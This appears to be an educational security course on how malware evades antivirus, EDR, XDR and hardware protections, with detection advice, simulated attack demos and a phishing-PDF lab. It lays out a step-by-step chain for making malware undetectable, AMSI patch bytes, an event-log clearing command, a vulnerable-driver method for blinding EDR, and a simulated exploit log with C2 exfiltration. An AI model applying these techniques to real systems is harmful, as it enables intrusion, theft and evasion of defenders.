Detection: Certificate reputation checks. Flag newly issued certs. Check for known stolen cert serial numbers (Stuxnet: Realtek 01 00 00 00 00 01 1E 3B 4E).

📊 Entropy Management

Encrypted/packed payloads have high entropy (~7.9/8.0). Security tools flag this. Attackers reduce entropy to look like normal executables (~5.0-6.5):

English text padding — Append paragraphs of Lorem Ipsum or Wikipedia text to the resource section
Steganography — Hide encrypted payload inside BMP/PNG image pixel data (low-entropy carrier)
XOR key cycling — Use keys that produce ASCII-range output instead of random bytes
Encoding instead of encryption — Base64 has entropy ~5.17, custom encoding schemes can be lower

Detection: Per-section entropy analysis (not whole-file). Detect large resource sections with English text + code sections with high entropy = suspicious combination.

⏰ Timestomping & Log Evasion

After landing on a system, attackers cover their tracks:

Timestomping — Modify file Created/Modified/Accessed timestamps to match legitimate system files (SetFileTime() or NtSetInformationFile). A dropped malware.exe gets timestamps from 2019 to blend with surrounding files. T1070.006
Event log clearing — wevtutil cl Security or Clear-EventLog. Nukes the Security event log. Ironic: clearing the log generates Event ID 1102 (log was cleared). T1070.001
Sysmon evasion — Unload Sysmon driver, or modify config to exclude attacker's processes. Or use direct syscalls so Sysmon's minifilter never sees the operation.
C2 traffic blending — Domain fronting (route C2 through legitimate CDNs like Cloudflare/AWS), DNS-over-HTTPS C2, or abuse legitimate services (Slack webhooks, Teams, Discord, Google Sheets as C2). T1090.004

Detection: $MFT (Master File Table) preserves original timestamps even when MACE timestamps are modified. Centralized SIEM — logs forwarded in real-time can't be retroactively deleted from the SIEM. Event ID 1102 alerts. JA3 fingerprinting of C2 traffic.

Putting It All Together — A Real FUD Build Chain

Here's how a real-world attacker combines every layer into one delivery:

🔗 Full FUD Delivery Chain (Educational Walkthrough)

STEP 1 — Build the payload
Tool: Custom RAT / Cobalt Strike / Sliver C2 framework
Output: beacon.exe (detected by 58/72 AV engines — completely burned)

STEP 2 — Encrypt with crypter (static evasion)
Tool: Private crypter (native C stub + AES-256)
Process: beacon.exe → AES encrypt → embed in stub → output.exe
Result: 12/72 detections (heuristics still flag it — stub pattern known)

STEP 3 — Add process injection (runtime evasion)
Stub modified: decrypt in memory → process hollow into RuntimeBroker.exe
Result: 3/72 detections (behavioral heuristics on injection pattern)

STEP 4 — Anti-sandbox + anti-debug
Add: CPU cores check, RAM check, 10-min sleep delay, mouse movement check
Result: 1/72 detections (one ML engine still suspicious of PE structure)

STEP 5 — Entropy reduction + signing
Pad resource section with legitimate strings, sign with purchased EV cert
Result: 0/72 detections — FUD achieved

STEP 6 — Embed in delivery vehicle
Option A: Pack into ISO/IMG → attach to spearphishing email (bypasses MotW)
Option B: Embed in PDF via /Launch or /OpenAction JavaScript
Option C: Host on compromised website → drive-by download
Option D: Side-load via legitimate signed application (DLL hijacking)

STEP 7 — Post-exploitation stealth
- AMSI patch (PowerShell now unmonitored)
- ETW patch (telemetry disabled for this process)
- Sleep encryption (Ekko — encrypted during 60s sleep cycles)
- Timestomp dropped files to match explorer.exe dates
- C2 over DNS-over-HTTPS to Cloudflare (looks like normal DNS traffic)

TOTAL EVASION LAYERS: 7 stacked techniques
COMBINED COST: ~$500-2000 (crypter + cert + C2 infra)
FUD LIFESPAN: 1-3 days before cloud telemetry catches it

🛡️ How Defenders Win Despite All This

Every evasion technique above has detection opportunities. The key insight: attackers can't evade every layer simultaneously.

Behavioral detection catches what signatures miss — even a FUD binary must eventually call VirtualAlloc → WriteProcessMemory → CreateRemoteThread. EDR sees the behavior, not the bytes.

Network detection catches what endpoint evasion misses — the C2 beacon must communicate. Even DNS-over-HTTPS C2 creates detectable traffic patterns (periodic intervals, fixed packet sizes).

Kernel telemetry catches what userland unhooking misses — kernel callbacks and ETW at the kernel level still report process creation, thread injection, and memory allocation even when ntdll hooks are removed.

Memory forensics catches what sleep obfuscation misses — periodic memory scans have a statistical chance of catching the beacon during its brief awake window. Detect RWX → RW transitions as suspicious.

This is an arms race — and defenders have the advantage of breadth. An attacker must defeat every defense. A defender only needs to catch the attacker once.

// 10 — Bypassing Modern Security ⏱ 18 min · Advanced

How Attackers Defeat Modern Defenses

Chapter 09 covered classic evasion — packers, crypters, process injection. But modern security infrastructure has evolved far beyond signature-based AV. Today's defenders deploy AI/ML models, cloud-detonation sandboxes, Extended Detection & Response (XDR), hardware-enforced security, and Zero Trust architectures. This chapter shows how the attacker side has evolved to match — and how each new defense creates a new bypass technique in an endless arms race.

⚠️ Educational Context Only

This section documents publicly known bypass techniques from security research papers, conference talks (DEF CON, Black Hat), and vendor advisories. Understanding how modern defenses are circumvented is essential for building resilient security architectures. All techniques described here have published mitigations.

Next-Gen Antivirus: How It Actually Works

Traditional AV matched file hashes and byte patterns. Next-Gen AV (NGAV) from vendors like CrowdStrike, SentinelOne, Cylance, and Microsoft Defender for Endpoint uses a multi-layered approach:

The 5-Layer NGAV Engine

① Static ML Model

Before execution. Trained on millions of PE features — import tables, section entropy, string patterns, header anomalies, compiler artifacts. Makes a malicious/benign prediction in <50ms. No signatures needed — classifies never-before-seen files.

Bypass: Adversarial ML — modify PE features (append benign strings, pad sections to lower entropy, add fake imports) to shift the model's decision boundary. Tools: MalGAN, EMBER adversarial.

② Behavioral Analysis

During execution. Monitors API call sequences, memory operations, file system changes, registry modifications, network connections. Builds a behavioral graph and compares against known attack patterns.

Bypass: API call unhooking (Ch 09), indirect syscalls, delayed execution, interleaving malicious calls with benign API noise to dilute the behavioral signal.

③ Cloud Lookup

File hash + metadata sent to vendor cloud in real-time. Cloud has access to global threat intelligence, shared IOCs, and heavier ML models too expensive to run locally. Can reclassify files retroactively after new intelligence arrives.

Bypass: Block outbound connections to AV cloud endpoints (e.g., *.wdcp.microsoft.com), use antiscan services instead of VirusTotal (which shares with vendors), ensure no prior submission of sample.

④ Cloud Sandbox Detonation

Suspicious files uploaded and executed in the vendor's cloud sandbox (Azure for Defender, CrowdStrike's Falcon Sandbox). Runs for 30-120 seconds, captures all behaviors, produces a verdict. More thorough than local analysis.

Bypass: Anti-sandbox evasion (Ch 09 Layer 5), execution delays >120s, environment-keying (only execute if %USERDOMAIN% matches target), human interaction gates (require mouse clicks to proceed).

⑤ Memory Scanning / AMSI

Scans content at runtime — PowerShell scripts, .NET assemblies, VBScript, JScript, even unpacked payloads in memory. AMSI hooks into script engines and provides the AV engine with the decoded content, defeating obfuscation.

Bypass: AMSI patching (Ch 09 Layer 4), hardware breakpoint hooking of AmsiScanBuffer, CLR profiler-based bypass, or avoiding managed runtimes entirely (use native C/C++ payloads).

Evading AI/ML Detection Models

ML models are the backbone of modern NGAV, but they have fundamental weaknesses that attackers exploit systematically:

Adversarial Feature Manipulation

ML models classify files based on extracted features. If you know (or can guess) which features the model uses, you can manipulate them without changing the payload's functionality.

Feature Manipulation Techniques

// Problem: ML flags high entropy in .text section
Fix: Insert dead code (junk functions that are never called)
     Entropy drops from 7.8 → 6.2 (below suspicion threshold)

// Problem: ML flags small import table
Fix: Add fake imports that are never used:
     LoadLibraryA("gdiplus.dll")  // GUI library - looks normal
     GetProcAddress("GdipDrawLine") // never called
     Import count: 6 → 42 (matches legitimate software)

// Problem: ML flags embedded strings ("shellcode", "inject")
Fix: Compile-time string encryption (XOR/AES)
     Strings only exist decrypted in memory at runtime
     Static ML never sees them

// Problem: ML flags abnormal PE section names
Fix: Use standard names: .text, .rdata, .data, .rsrc
     Never use custom names like .crypt, .pack, .vmp

Model Profiling & Evasion-as-a-Service

Sophisticated attackers profile the target's specific AV/ML model before deployment:

ML Evasion Workflow

Step 1: Identify Target AV
  Recon: job postings mention "CrowdStrike"
  Or: phishing lure returns Defender-specific error

Step 2: Set Up Local Copy of Target AV
  Install same product + version in test VM
  Enable cloud features (use burner license)

Step 3: Iterative Testing
  Submit payload → observe detection → modify → resubmit
  Automated via: DefenderCheck, ThreatCheck
  These tools binary-search the file to find
  the EXACT byte range triggering detection

Step 4: Feature Perturbation
  Modify only the flagged features
  Re-test until 0 detections locally
  Test against antiscan.me (doesn't share with vendors)

Step 5: Deploy
  FUD window: typically 24-72 hours
  Before vendor cloud updates models with new sample

EDR → XDR: The Detection Evolution

EDR watches endpoints. XDR (Extended Detection & Response) correlates signals across endpoints, network, email, cloud, and identity — making evasion exponentially harder because attackers must be invisible across every data source simultaneously.

XDR Correlation — Why Single-Layer Evasion Fails

XDR Cross-Signal Detection

ENDPOINT signal: svchost.exe (PID 7284) → RWX allocation + beacon behavior
  Alone: Low confidence (svchost does allocate memory legitimately)

NETWORK signal: svchost.exe → HTTPS to cdn-update.azureedge[.]net every 60s
  Alone: Low confidence (legitimate Azure CDN traffic exists)

EMAIL signal: User received .docm attachment 4 minutes before svchost anomaly
  Alone: Low confidence (user receives documents daily)

IDENTITY signal: Same user attempted 3 failed logins to DC01 after svchost spawn
  Alone: Low confidence (password typos happen)

☆ XDR CORRELATION: Email(malicious attachment) → Endpoint(process injection)
  → Network(C2 beacon) → Identity(lateral movement attempt)
  COMBINED CONFIDENCE: 99.7% — automatic containment triggered
  Actions: Isolate host, disable user account, block C2 domain

How Attackers Try to Beat XDR

Living-off-the-Land (LOL): Use only built-in OS tools (certutil, mshta, PowerShell) so endpoint signals blend with normal admin activity.

C2 over legitimate services: Abuse Slack, Discord, OneDrive, Google Sheets as C2 channels — network traffic goes to trusted domains.

Credential harvesting before lateral movement: Dump credentials from memory (Mimikatz-style) and use legitimate RDP/WinRM with real creds — identity layer sees "valid" authentication.

Slow & low: Operate over days/weeks at very low volume. XDR correlation windows are typically 24-48 hours — if attack stages span weeks, they may not correlate.

Why XDR Still Wins (Usually)

Retroactive correlation: When a new IOC is discovered, XDR searches historical telemetry (30-90 days) — activities that seemed benign at the time are re-evaluated.

UEBA (User Behavior Analytics): ML baselines each user's normal patterns. Even with valid credentials, unusual access times, abnormal file access patterns, or first-time connections trigger anomaly alerts.

Automated response: XDR can isolate a host in <30 seconds — faster than any human attacker can pivot. Even if the attacker evades detection on 3 layers, correlation with the 4th triggers containment.

Hardware-Enforced Security

Modern CPUs and operating systems now enforce security at the hardware level — protections that cannot be bypassed from userland regardless of how sophisticated the malware is.

HVCI — Hypervisor Code Integrity

Windows runs a tiny hypervisor (VBS — Virtualization-Based Security) beneath the OS. The kernel itself runs in a virtual machine. HVCI ensures every driver and kernel module is signed — even a kernel exploit cannot load unsigned code because the hypervisor enforces the policy from a higher privilege level.

Impact: Rootkits and unsigned kernel drivers are blocked even with admin/SYSTEM access. Attackers need a hypervisor escape (extremely rare).

Bypass attempts: Disable VBS via boot config (requires physical access + admin), exploit vulnerable signed drivers (BYOVD — Bring Your Own Vulnerable Driver), hypervisor escape (0-day class).

CET — Control-flow Enforcement Technology

Intel CET adds a hardware shadow stack that mirrors the software call stack. On every RET instruction, the CPU checks if the return address matches the shadow stack. If they differ (buffer overflow modified the return address), the CPU raises a #CP exception — the exploit fails at the hardware level.

Impact: Classic stack buffer overflow → ROP chain exploits are dead on CET-enabled systems. EIP/RIP hijacking via stack smash no longer works.

Bypass attempts: JIT spray (corrupt JIT-compiled code regions), data-only attacks (corrupt data structures, not code flow), exploit non-CET processes (legacy 32-bit apps).

Secure Boot + TPM 2.0

Secure Boot verifies every component in the boot chain — firmware → bootloader → kernel → drivers — using cryptographic signatures. TPM (Trusted Platform Module) stores measurements of each boot component. If any component is modified (bootkit), the chain breaks and the system won't boot or reports tampered state to remote attestation servers.

Impact: Bootkits (MBR/VBR/UEFI rootkits) that persist below the OS are blocked. BlackLotus (2023) was the first known UEFI bootkit to bypass Secure Boot in the wild.

Bypass: CVE-2022-21894 (BlackLotus exploited a Secure Boot vulnerability). Microsoft revoked the vulnerable bootloader but rollout is slow — many systems remain vulnerable as of 2024.

BYOVD — Bring Your Own Vulnerable Driver

When HVCI blocks unsigned drivers, attackers bring a legitimately signed but vulnerable driver (e.g., old GPU drivers, anticheat modules, hardware utilities) and exploit its vulnerability to gain kernel code execution. The driver passes signature checks because it is genuinely signed — it's just buggy.

BYOVD Attack Flow — MITRE T1068

1. Drop signed vulnerable driver: RTCore64.sys (MSI Afterburner)
2. Load via sc.exe create — passes HVCI signature check ✓
3. Exploit CVE-2019-16098 (arbitrary memory R/W in driver)
4. Use kernel R/W to disable EDR kernel callbacks
5. Remove PsSetCreateProcessNotifyRoutine entries
6. EDR is now fully blinded — kernel telemetry gone

Known abused drivers: RTCore64.sys, dbutil_2_3.sys (Dell),
  gdrv.sys (Gigabyte), ene.sys (ENE Technology), cpuz141.sys
Microsoft maintains a blocklist but it's perpetually incomplete.

Zero Trust Architecture — The Network Evolution

Traditional networks have a perimeter (firewall) — once inside, assets trust each other. Zero Trust assumes every request is potentially malicious, regardless of source. This fundamentally changes the attacker's playbook:

Zero Trust Principles vs. Attacker Impact

Zero Trust Principle	What It Blocks	Attacker Workaround
Verify explicitly — authenticate every request with MFA + device health + location + risk score	Stolen credentials alone are insufficient. Even with valid AD creds, MFA + device compliance check blocks lateral movement.	MFA fatigue attacks (push spam), SIM swapping, adversary-in-the-middle (AiTM) phishing proxies like `Evilginx2` that capture session tokens post-MFA.
Least-privilege access — users/services get minimum required permissions, just-in-time access only	Compromised accounts can reach only what they're explicitly authorized. No "Domain Admin" always-on access.	Target JIT approval workflows. Social engineer the approver. Abuse legitimate access to escalate via misconfigurations (Azure AD role abuse, delegation attacks).
Assume breach — microsegmentation, encrypt all internal traffic, continuous monitoring	Lateral movement hits microsegment boundaries. Internal traffic is TLS-encrypted, preventing sniffing. Every hop is logged.	Abuse allowed application pathways (e.g., if the web server is allowed to talk to the DB, compromise the web server and use its legitimate connection). "Living inside the allowed traffic."

🔑 The Session Token Economy

In a Zero Trust world, the most valuable artifact isn't credentials — it's session tokens. Once a user completes MFA and gets a session cookie (e.g., an Azure AD Primary Refresh Token), anyone who steals that token inherits the authenticated session — bypassing MFA completely. This is why attacks like AiTM phishing (Evilginx2, Modlishka), token theft (dumping browser cookies, PRT extraction), and pass-the-cookie attacks are the dominant initial access technique in 2024–2026.

Beyond Windows: Cloud, macOS & Linux Security

The attack surface has expanded far beyond Windows endpoints. Modern attackers target the entire infrastructure stack:

Cloud Infrastructure Attacks

SSRF → IMDS: Server-Side Request Forgery hitting the cloud metadata service (169.254.169.254) to steal instance credentials. Single HTTP request → full cloud account compromise.

IAM privilege escalation: Misconfigured AWS IAM roles/policies allowing iam:PassRole + lambda:CreateFunction → create Lambda with admin role → full account takeover.

Container escape: Kubernetes pods with privileged: true or mounted Docker socket → escape to host → pivot across cluster.

Supply chain: Compromise CI/CD pipelines (GitHub Actions, Jenkins), inject backdoors into build artifacts that deploy to thousands of targets (SolarWinds model).

macOS & Linux Defenses + Bypasses

macOS Gatekeeper: Blocks unsigned/unnotarized apps. Bypass: Abuse archive formats that strip quarantine attributes (CVE-2022-42821 — Archive Utility bypass).

macOS SIP (System Integrity Protection): Kernel-level protection of system files. Bypass: Exploit entitled Apple daemons that have SIP exceptions (e.g., the system_installd Shrootless bug, CVE-2021-30892).

Linux eBPF monitoring: Modern EDRs use eBPF for deep kernel visibility. Bypass: Manipulate eBPF maps, exploit eBPF verifier bugs (CVE-2021-4204), or use kernel-level rootkits to hide from eBPF probes.

Linux SELinux/AppArmor: Mandatory access controls. Bypass: Exploit processes running in unconfined domains, abuse allowed transitions, or find kernel vulns that bypass MAC entirely.

🛡️ The Defender's Advantage in the Modern Era

Despite every bypass technique above, the defender's position has never been stronger. Here's why:

Attack cost has skyrocketed: In 2015, a reliable exploit chain cost ~$50K. In 2026, a full iOS chain is worth $2M+ (Zerodium pricing). Hardware security, HVCI, CET, and hardened browsers have made exploitation dramatically more expensive.

Detection breadth is overwhelming: XDR correlates 5+ data sources. An attacker who evades endpoint ML still gets caught by network anomaly detection, email analysis, identity analytics, or cloud audit logs.

Automation favors defenders: SOAR platforms can isolate hosts, revoke tokens, and block IPs in under 30 seconds. The attacker's window between initial access and containment is shrinking every year.

Hardware can't be patched by malware: HVCI, CET, Secure Boot, and TPM create trust anchors that software-only attacks simply cannot reach. This is a fundamental architectural advantage.

// 11 — Demonstrations ⏱ 4 min · Beginner

Experience It (Safely)

These interactive demos simulate what happens during real attacks — using only safe, simulated data in your browser. No actual exploits, shellcode, or malicious network connections are involved. Each demo recreates the visible and invisible output an analyst would see when examining a real attack, so you can understand both what the user sees (nothing unusual) and what's actually happening behind the scenes.

Demo 1: Document Metadata Extraction

What this simulates: Every Office/PDF document contains metadata — author names, software versions, creation timestamps, printer names, file paths, and revision histories. Attackers use this for reconnaissance: before sending a phishing email, they'll harvest documents from the target organization's website (investor reports, published PDFs, public filings) and extract metadata to learn employee names, internal software versions, directory structures, and network paths. This demo shows you the exact metadata fields that tools like exiftool, FOCA, and metagoofil extract from a typical Office document.

What to look for: The Author field reveals real employee names. The Software field reveals Office version (which tells the attacker which CVEs might work). The Template field can reveal internal server paths. The LastSavedBy field shows who edited the document last — potentially a different employee than the author.

Demo 2: Simulated Zero-Click Notification

What this simulates: A zero-click exploit targeting a messaging app. In real attacks (like FORCEDENTRY or the WhatsApp VOIP bug), the victim receives a message or call that triggers automatic parsing of malicious data — no taps, clicks, or interaction required. This demo recreates the kill chain: (1) incoming message notification appears, (2) the messaging app's parser processes the attachment automatically, (3) the parser triggers a buffer overflow in the image/media decoder, (4) the overflow redirects execution to shellcode, (5) the shellcode installs a persistent implant. Everything happens in under 2 seconds — the victim's only visible indicator is a brief notification that may disappear.

What to look for: Watch the timing — the exploit completes before a human could possibly react. Notice how the "legitimate" app functionality (receiving a message) is the attack vector. In real forensics, the only artifact might be a log entry showing the message was received and deleted, or an anomalous crash report from the parser component.

[SIMULATED] Zero-Click iMessage Exploit Chain (FORCEDENTRY-style) ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ >> Incoming iMessage from unknown sender: +1-555-0199 [00.000s] iMessage received — attachment: IMG_0847.gif (47 KB) [00.001s] BlastDoor sandbox: parsing attachment in isolated process [00.003s] ImageIO framework: detecting format... JBIG2 inside PDF [00.005s] JBIG2 decoder: loading segment table... 70,247 segments [00.008s] Segment 1-1000: bitmap operations (AND, OR, XOR) [00.045s] Segment 1001-5000: building register file in memory [00.112s] Segment 5001-20000: constructing ALU operations [00.340s] Segment 20001-70247: executing virtual machine program >> ██ JBIG2 VM EXPLOITATION ██ [00.341s] VM computed: heap buffer overflow address [00.342s] Heap overflow triggered in CoreGraphics [00.343s] Control flow hijacked — PC redirected >> STAGE 2: Sandbox Escape [00.345s] Exploiting second vulnerability to escape BlastDoor [00.347s] Gained access to imagent process (PID 1847) [00.349s] Privilege escalation via kernel vulnerability... [00.355s] Root access achieved >> STAGE 3: Implant Installation [00.360s] Disabling crash reporter (CrashMover) [00.365s] Writing implant to /private/var/tmp/.com.apple.sbd [00.370s] Registering LaunchDaemon for persistence [00.380s] Connecting to C2: 185.xxx.xxx.xxx:443 (TLS 1.3) [00.520s] Beacon established — full device access >> STAGE 4: Data Exfiltration [00.600s] Accessing: Messages.app database (SMS + iMessage) [00.700s] Accessing: Contacts (4,847 entries) [00.800s] Enabling: Microphone (background recording) [00.900s] Enabling: Camera (periodic screenshots) [01.000s] Accessing: GPS location (continuous tracking) [01.100s] Accessing: Keychain (stored passwords + tokens) [01.200s] Accessing: Safari history + saved passwords [01.300s] Accessing: WhatsApp / Signal / Telegram databases >> ████████ DEVICE FULLY COMPROMISED ████████ >> What the victim saw: Absolutely nothing. >> What the victim heard: Nothing. >> Total elapsed time: 1.3 seconds >> User interaction: ZERO (no tap, no click, no notification) >> iMessage thread: Auto-deleted by implant ⚠ THIS IS A SIMULATION — no real exploit was executed.

Demo 3: Macro Execution Simulation

What this simulates: What happens inside the Office process when a user clicks "Enable Content" on a macro-laden document. In the real attack: (1) Office loads the VBA project from the document's vbaProject.bin OLE stream, (2) it compiles the VBA code to p-code, (3) it executes Auto_Open() or Document_Open() automatically, (4) the macro uses Shell() or WScript.Shell to launch PowerShell, (5) PowerShell downloads and executes a second-stage payload from the attacker's C2 server. This demo shows each stage with the actual process tree and command lines that a forensic analyst would see in Sysmon logs.

What to look for: The process chain: WINWORD.EXE → cmd.exe → powershell.exe → beacon.exe. In real attacks, the PowerShell command is often base64-encoded (-enc flag) and uses Invoke-Expression (IEX) with Net.WebClient.DownloadString() to pull the next stage entirely in memory — never touching disk.

Demo 4: PDF Exploit Dissection

What this simulates: The complete lifecycle of a malicious PDF being opened in Adobe Reader. This is the same attack detailed in Section 05 (Exploit Crafting Pipeline), but shown from the runtime perspective — what actually happens second by second inside the Reader process. The demo traces: (1) PDF header parsing and object loading, (2) Catalog traversal finding the /OpenAction reference, (3) JavaScript Action object loading and stream decompression, (4) SpiderMonkey JS engine executing the heap spray loop (allocating ~200MB of NOP sled + shellcode), (5) the vulnerable API call (Collab.collectEmailInfo) triggering the buffer overflow, (6) EIP hijack to 0x0C0C0C0C, (7) CPU sliding through the NOP sled, (8) shellcode execution — PEB walk → API resolution → download → backdoor execution.

What to look for: The heap spray creates a distinctive memory pattern — hundreds of identical 1MB blocks at predictable addresses. EDR tools detect this by monitoring VirtualAlloc call frequency. The vulnerability trigger (Collab.collectEmailInfo) is a known dangerous function that PDF security scanners flag. The child process spawn (AcroRd32.exe → cmd.exe) is the most reliable detection point.

FUD & Evasion Demonstrations

The following demos simulate the evasion techniques covered in Chapter 08 — FUD. Each one recreates exactly what an analyst would see in process monitors, debuggers, and EDR telemetry when these techniques are used in real malware.

Demo 5: Crypter / Packer in Action

What this simulates: A raw RAT payload (AsyncRAT.exe) being processed through a crypter. The demo shows the exact sequence: (1) the original executable is scanned and flagged by 47/72 AV engines, (2) the crypter reads the PE file, encrypts each section with AES-256, (3) a new stub executable is generated that contains the encrypted payload as a resource, (4) at runtime the stub decrypts the payload in memory and passes control to the original entry point — never writing the decrypted payload to disk. The final stub is scanned again: 0/72 detections. This is exactly how services like Veil, Hyperion, and commercial crypters work.

What to look for: Notice the entropy change — the original PE has distinct .text, .data, .rdata sections with varying entropy. After crypting, the payload blob shows near-uniform 7.98 entropy (near-random). EDR tools flag this — legitimate software rarely has sections above 7.0 entropy. Also watch the stub's import table: it only imports VirtualAlloc, RtlMoveMemory, and a few crypto APIs — a suspiciously minimal import table compared to normal software.

Demo 6: Process Hollowing (RunPE) Step-by-Step

What this simulates: The complete RunPE process hollowing technique. A malicious loader spawns a legitimate Windows process (svchost.exe) in a SUSPENDED state, hollows out its memory, writes a malicious payload into the hollowed process, fixes up the thread context to point to the new entry point, and resumes execution. The result: the malicious code runs under the identity of a trusted Windows process. This is the #1 technique used by crypter stubs to execute decrypted payloads in memory.

What to look for: Watch the API call sequence — this is the exact pattern EDR tools signature: CreateProcess(SUSPENDED) → NtUnmapViewOfSection → VirtualAllocEx → WriteProcessMemory → SetThreadContext → ResumeThread. Any process that calls this exact chain is almost certainly performing process hollowing. Also notice the parent-child mismatch: svchost.exe is normally spawned by services.exe, not by a random executable — EDR flags this anomaly.

Demo 7: AMSI Bypass + PowerShell Payload

What this simulates: An attacker bypassing the Anti-Malware Scan Interface (AMSI) in PowerShell before executing a malicious script. AMSI is Microsoft's scanning hook — every PowerShell command, VBScript, and JScript is sent to the installed AV engine before execution. Attackers bypass it by patching the AmsiScanBuffer function in memory to always return "clean." This demo shows: (1) a malicious PowerShell command being blocked by AMSI, (2) the memory patch being applied (overwriting the first bytes of AmsiScanBuffer with a RET instruction), (3) the same command now executing successfully because AMSI no longer scans it.

What to look for: The bypass is a single memory write — changing 3 bytes (0xB8 0x57 0x00 0x07 0x80 0xC3 = mov eax, 0x80070057; ret) at the start of amsi.dll!AmsiScanBuffer. This makes every subsequent scan return AMSI_RESULT_CLEAN. Defenders detect this by monitoring VirtualProtect calls targeting amsi.dll memory regions, or by using ETW events that fire before AMSI even processes the scan.

Demo 8: EDR Unhooking via Direct Syscalls

What this simulates: How malware evades EDR (Endpoint Detection & Response) by bypassing userland hooks. Modern EDR products (CrowdStrike, SentinelOne, Defender for Endpoint) inject a DLL into every process that hooks critical ntdll.dll functions — when malware calls NtAllocateVirtualMemory or NtWriteVirtualMemory, the hook redirects execution to the EDR's monitoring code first. This demo shows two bypass methods: (1) Fresh DLL mapping — reading a clean copy of ntdll.dll from disk and overwriting the hooked copy in memory, and (2) Direct syscalls — calling the kernel directly via the syscall instruction, completely skipping ntdll.dll and all its hooks.

What to look for: In Method 1, watch the EDR hooks disappear — the function prologue changes from jmp EDR_Hook back to the original mov r10, rcx; mov eax, SSN. In Method 2, notice the syscall is made directly from the malware's own code — there's no call into ntdll.dll at all. Defenders counter this with kernel callbacks (which can't be unhooked from userland) and by monitoring for processes that read ntdll.dll from disk with CreateFile — legitimate software never does this.

Demo 9: Anti-Sandbox Evasion Checks

What this simulates: A malware sample performing environment checks before executing its payload. Sophisticated malware won't detonate in analysis environments — it checks for signs of sandboxes (low CPU cores, small RAM, short uptime), virtual machines (VMware/VirtualBox artifacts, hypervisor CPUID bit), and debuggers (timing checks, PEB flags, hardware breakpoints). If any check fails, the malware exits cleanly or runs benign code instead — appearing "clean" to automated analysis systems. This demo runs through real checks that malware like Emotet, TrickBot, and Cobalt Strike beacons perform.

What to look for: Notice the layered approach — the malware doesn't rely on a single check. It performs 12+ checks across CPU, memory, processes, registry, timing, and user behavior. Each check alone might have false positives, but the combination creates a reliable sandbox fingerprint. Pay attention to the mouse movement check — many sandboxes have static cursors. The "delayed execution" trick (sleeping 5+ minutes) is designed to outlast sandbox analysis timeouts, which typically run samples for 60-120 seconds.

✅ These demos are 100% safe No actual exploits or malicious code is used. All demonstrations are visual simulations running entirely in your browser using JavaScript setTimeout() calls and DOM manipulation. No network requests are made. No files are created. No system APIs are called. The "hex bytes" and "memory addresses" shown are pre-written strings — not actual memory contents. You can verify this by viewing the page source.

// 14 — PDF Lab ⏱ 10 min · Intermediate

Social Engineering PDF Lab

Social engineering is the #1 initial access vector. Attackers don't just send malware — they send convincing documents. An invoice PDF from a "vendor" is far more likely to be clicked than a random attachment. In this lab, you'll generate a real professional invoice PDF and study what separates it from a weaponized one.

🎓 Lab Objective — Generate a professional-looking invoice PDF with an embedded download link (pointing to a legitimate app like PuTTY). Then study: (1) what makes this PDF benign, (2) what structural changes would make it malicious, and (3) what security tools look for when analyzing PDFs. Test it against your AV/sandbox to see what does and doesn't trigger.

Invoice PDF Generator

Fill in the invoice details below. The generated PDF will contain a visible download link — just like a real phishing document would. The link points to whatever URL you specify (e.g., the official PuTTY download). Everything runs client-side.

Sender Company Name

Invoice Number

Recipient Name

Recipient Company

Invoice Amount ($)

Service Description

⬇ Download Link Configuration — This is the social engineering element. The PDF will contain a professional-looking button/link that encourages the recipient to download software. In a real attack, this URL would point to malware. For this lab, we use a legitimate application.

Download URL (Link Target)

Button Text on PDF

🧪 Lab Exercise — After generating the PDF: (1) Open it in your PDF reader and click the link. Does your browser warn you? (2) Upload it to an online sandbox (e.g., any.run, hybrid-analysis.com) — what does it flag? (3) Send it to yourself via email — does your email gateway quarantine it? (4) Check the PDF with pdfid or pdf-parser — what objects do you see?

Benign vs. Weaponized — What Changes?

Your generated invoice is completely benign. Here's exactly what separates it from a real weaponized phishing PDF — and why understanding the difference matters for threat hunting.

✅ YOUR PDF (Benign)

LINK Contains a standard /URI annotation — a normal clickable hyperlink. The user sees it, clicks it voluntarily, browser navigates.

NO JS Zero JavaScript. No /JavaScript or /JS entries in the PDF object tree.

NO AUTO No /OpenAction or /AA (Additional Actions). Nothing executes when the PDF is opened.

NO EMBED No embedded files (/EmbeddedFile), no file attachments, no embedded executables.

VISIBLE The link URL is visible to the user. Nothing is hidden or obscured.

STATIC Pure static content — text, rectangles, colors. No forms, no AcroForms, no XFA.

❌ WEAPONIZED PDF (Explained)

/Launch Uses /Launch action to execute a command when clicked — can run cmd.exe, PowerShell, or an embedded EXE directly.

/JavaScript Embedded JavaScript that triggers on open. Can exploit reader vulnerabilities (CVE-2009-0927, CVE-2013-2729).

/OpenAction Auto-executes when PDF is opened — no user click required. Combined with /JS for zero-click exploitation.

/EmbeddedFile Contains an embedded executable inside the PDF stream, extracted and launched by JavaScript or /Launch action.

OBFUSCATED Streams compressed with FlateDecode, ASCIIHexDecode, or custom filters. Object references chained to evade static analysis.

EXPLOIT Malformed objects targeting parser vulnerabilities — heap sprays, integer overflows, use-after-free in the rendering engine.

PDF Object Tree — What Analysts See

When you run pdfid on your generated invoice, here's what it reports vs. what a malicious PDF would show:

pdfid your-invoice.pdf

/Page          1
/URI           1
/Action        1
/JavaScript    0    ← clean
/JS            0    ← clean
/OpenAction    0    ← clean
/Launch        0    ← clean
/EmbeddedFile  0    ← clean
/AcroForm      0    ← clean
/XFA           0    ← clean
/Encrypt       0
/ObjStm        0

pdfid malicious-invoice.pdf

/Page          1
/URI           0
/Action        3    ← suspicious
/JavaScript    2    ← 🚩 ALERT
/JS            2    ← 🚩 ALERT
/OpenAction    1    ← 🚩 auto-exec
/Launch        1    ← 🚩 cmd exec
/EmbeddedFile  1    ← 🚩 payload
/AcroForm      1    ← 🚩 forms
/XFA           0
/Encrypt       1    ← hides content
/ObjStm        3    ← compressed objs

🚩 Phishing PDF Red Flags — What to Hunt For

Use this checklist when analyzing suspicious PDFs during incident response or threat hunting. Each flag is mapped to the MITRE ATT&CK framework.

Urgency Language

"OVERDUE", "FINAL NOTICE", "Act within 24 hours" — social pressure to bypass critical thinking.

T1566.001 — Spearphishing Attachment

Mismatched Sender

Invoice from "CloudSync Technologies" but email is from billing@cl0udsync-tech.com — typosquatting domain.

T1583.001 — Acquire Infrastructure: Domains

Download Prompts Inside PDFs

"Download the secure client" — legitimate invoices never ask you to install software. This is the #1 social engineering trigger.

T1204.002 — User Execution: Malicious File

/JavaScript or /JS Present

PDFs containing JavaScript are almost always malicious in a corporate context. Legitimate invoices have zero need for JS.

T1059.007 — Command and Scripting: JavaScript

